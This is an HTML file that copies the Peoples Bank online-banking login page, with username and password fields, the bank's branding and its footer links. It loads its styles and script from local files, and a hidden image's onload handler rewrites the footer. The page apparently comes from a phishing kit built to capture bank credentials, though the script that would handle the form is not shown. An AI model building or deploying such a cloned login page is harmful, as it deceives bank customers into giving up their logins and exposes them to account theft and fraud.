<!DOCTYPE html>
<html class="js flexbox fontface objectfit object-fit csspositionsticky cssreflections no-regions cssresize shapes siblinggeneral subpixelfont supports csstransforms3d preserve3d canvas canvastext emoji devicemotion deviceorientation svg svgasimg svgclippaths svgfilters svgforeignobject inlinesvg smil no-touchevents typedarrays uagent-chrome uagent-webkit uagent-osWindows" lang="en" style="background-image: url(&quot;https://cdn1.onlineaccess1.com/cdn/depot/3258_01/3384/0ac480faa27b13c8bb7ac3dc6a1f7ee3/assets/images/desktop-background-85e6d6c3c4694aa42c88cf05182b409c.jpg&quot;);" stencil-hydrated=""><!--<![endif]--><head id="pageheader"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <head>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1" />
      <link rel="stylesheet" href="./snipped.css">
      <link rel="stylesheet" href="./app.css">
      <link rel="stylesheet" href="./main.css">
      <script src="./common.js"></script>

    
   </head>
   <body>
<div class="login-outer">
    <div class="login-inner" id="login-inner">
        
        <div class="login-title">
            <h1 id="ember47" class="ui-logo large ember-view"><span class="sr-only" test-id="logoDescriptiveText" >Peoples Bank</span>
                <div aria-hidden="true" class="logo-image" test-id="logoDiv"></div>
            </h1>
        </div>
        <div class=" login-message login-alert-message loginFormArea">
            <div id="ember23" class="login-alert-container alert-message_container static-alert hidden ember-view">
                <div class="alert alert-msg alert-message_content alert-danger" role="alert" aria-live="assertive">
                    <div class="alert-message_inner">
                        <p>
                            <span class="ui-icon icon-warning-sign " aria-hidden="true" aria-label="error"></span>
                        </p>
                        <p class="alert-message_sizer" style="">X</p>
                    </div>
                </div>
            </div>
        </div>
        <div class="login-form loginFormArea">
            <form class="is-invalid" data-ember-action="" data-ember-action-24="24">
                <div class="field ">
                    <label class="login-field" for="fldUsername">Login ID</label>
                    <input test-id="fldUsername" spellcheck="false" autocapitalize="off" autocorrect="off" placeholder="" autocomplete="off" title="" id="fldUsername" class="mrg-T-sm login-field form-control ember-text-field form-control ember-view" type="text">
                </div>
                <div class="password field">
                    <label class="login-field" for="fldPassword">Password</label>
                    <input test-id="fldPassword" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off" id="fldPassword" class="mrg-T-sm login-field form-control ember-text-field form-control ember-view" type="password">
                </div>
                <div id="submissionArea">
                    <div id="userLinks">
                        <div id="rememberUserNameArea">
                            <div description-id="ember50-description" test-id="ckbRememberUser" id="ember50" class="ui-checkbox ember-view"><input class="sr-only" id="ckbRememberUser" type="checkbox">
                    <label for="ckbRememberUser">
                    <svg aria-hidden="true" focusable="true" width="20" height="20" viewBox="0 0 20 20">
                    <rect fill="none" stroke="none" stroke-width="2" x="1" y="1" width="18" height="18" rx="3"></rect>
                    <polyline fill="none" stroke="none" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" points="4 11.4390244 7.44978307 15.0611808 16 5"></polyline>
                    </svg>
                    <div class="inner-label ">
                        <div test-id="txtLabel" class="inner-text">
                            Remember me
                        </div>
                    <!---->    </div>
                    </label>
                    </div>
                        </div>
                        <button class="btn btn-primary ember-view"  >
                            <div class="icon"></div>Log In
                        </button>
                        <div class="clearfix password-links">
                            <div class="pull-right password-link">
                                <a href="#/login/resetPasswordUsername" id="ember27" class="ember-view"> <span class="forgot-pw" test-id="lnkForgottenPW">Forgot your password?</span>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </form>
        </div>
        <div class="login-icons clearfix">
            <a target="_blank" class="login-adLink" href="https://www.peoplesbancorp.com/contact-us/" onclick="window.open(this.href,'_system'); return false;">Contact Us</a>
            <a target="_blank" class="login-adLink" href="https://locations.peoplesbancorp.com/" onclick="window.open(this.href,'_system'); return false;">Locations</a>
            <a target="_blank" class="login-adLink" href="https://www.peoplesbancorp.com/about-us/privacy-and-security/" onclick="window.open(this.href,'_system'); return false;">Privacy Policy</a>
            <a target="_blank" class="login-adLink" href="https://www.peoplesbancorp.com/checking/open-an-account/" onclick="window.open(this.href,'_system'); return false;">Open an Account</a>
            <a target="_blank" class="login-adLink" href="https://www.peoplesbancorp.com/additional-services/digital-tools/enroll-in-online-banking/" onclick="window.open(this.href,'_system'); return false;">Enroll</a>
            <a target="_blank" mobile-window="main" class="login-adLink" href="https://online.peoplesbancorp.com/peoplesbankonlinebanking/sdk/AccountRecovery">Unlock/Forgot Username</a>
        </div>
        <div class="preLogon">
            <div id="injected_footerContent" class="style-ELqO1">
                <a target="_blank" class="login-adLink" href="https://www.peoplesbancorp.com/contact-us/" onclick="window.open(this.href,'_system'); return false;">Contact Us</a>
                <a target="_blank" class="login-adLink" href="https://locations.peoplesbancorp.com/" onclick="window.open(this.href,'_system'); return false;">Locations</a>
                <a target="_blank" class="login-adLink" href="https://www.peoplesbancorp.com/about-us/privacy-and-security/" onclick="window.open(this.href,'_system'); return false;">Privacy Policy</a>
                <a target="_blank" class="login-adLink" href="https://www.peoplesbancorp.com/checking/open-an-account/" onclick="window.open(this.href,'_system'); return false;">Open an Account</a>
                <a target="_blank" class="login-adLink" href="https://www.peoplesbancorp.com/additional-services/digital-tools/enroll-in-online-banking/" onclick="window.open(this.href,'_system'); return false;">Enroll</a>
                <a target="_blank" mobile-window="main" class="login-adLink" href="https://online.peoplesbancorp.com/peoplesbankonlinebanking/sdk/AccountRecovery">Unlock/Forgot Username</a>
            </div>
            <img style="visibility:hidden" src="./images/gif;base64,%20R0lGODlhAQABAIAAAAUEBAAAACwAAAAAAQABAAACAkQBADs=" onload="$('.login-icons').empty().append($('#injected_footerContent')[0].innerHTML);">
        </div>
        <a href="images/logo_large-bb6bae76aa2b18809a67c49ef816967a.png" target="_blank" rel="noopener" test-id="complianceLogo">
            <img src="./images/fdic_logo_small-7904e3fe1c4bfb9560fae184a7cbcffc.png">
        </a>
    </div>
</div>
   </body>
</html>
